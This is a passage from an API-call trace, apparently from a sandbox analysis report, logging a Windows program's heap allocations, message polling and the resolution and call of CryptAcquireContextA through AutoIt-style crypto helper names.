Flags=0x0, Size=0x4) returned 0x2e54cb8 [0157.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0157.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0157.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0157.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0157.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0157.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0157.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0157.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0157.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0157.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0157.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0157.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0157.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0157.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0157.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0157.790] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0157.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0157.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0157.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0157.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0157.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0157.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0157.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0157.791] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.791] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0157.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0157.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0157.791] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0157.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0157.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0157.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0157.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0157.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0157.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0157.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0157.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0157.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0157.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0157.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0157.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0157.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0157.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0157.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0157.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0157.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0157.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0157.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0157.792] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0157.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0157.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0157.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0157.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0157.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0157.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0157.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0157.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0157.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0157.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0157.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0157.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0157.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0157.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0157.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0157.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0157.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0157.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0157.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0157.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0157.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0157.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0157.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0157.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0157.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0157.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0157.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0157.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0157.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0157.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0157.794] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0157.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0157.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0157.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0157.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0157.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0157.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0157.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0157.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69a08 [0157.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69a08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0157.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0157.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0157.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0157.795] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0157.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0157.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0157.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0157.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0157.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0157.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0157.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0157.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0157.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0157.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0157.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0157.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0157.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0157.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0157.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0157.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0157.795] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0157.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0157.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0157.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0157.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0157.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0157.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0157.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0157.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0157.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0157.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0157.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0157.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0157.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0157.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0157.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0157.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0157.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0157.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0157.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0157.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0157.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0157.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0157.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0157.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0157.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0157.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0157.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0157.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0157.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0157.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0157.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0157.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0157.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0157.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0157.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0157.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0157.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0157.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0157.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0157.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0157.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0157.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0157.799] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0157.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0157.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0157.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0157.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0157.799] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0157.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0157.799] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0157.799] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0157.799] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.799] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.799] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.799] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0157.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0157.800] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0157.800] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0157.800] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.800] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0157.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0157.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0157.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0157.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0157.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0157.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0157.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0157.800] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0157.800] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0157.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0157.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0157.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0157.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0157.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0157.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0157.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0157.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0157.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0157.801] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0157.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0157.801] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0157.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0157.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0157.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0157.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0157.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0157.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0157.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0157.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0157.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0157.801] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0157.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0157.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0157.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0157.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0157.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0157.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0157.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0157.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0157.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0157.802] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0157.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0157.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0157.802] 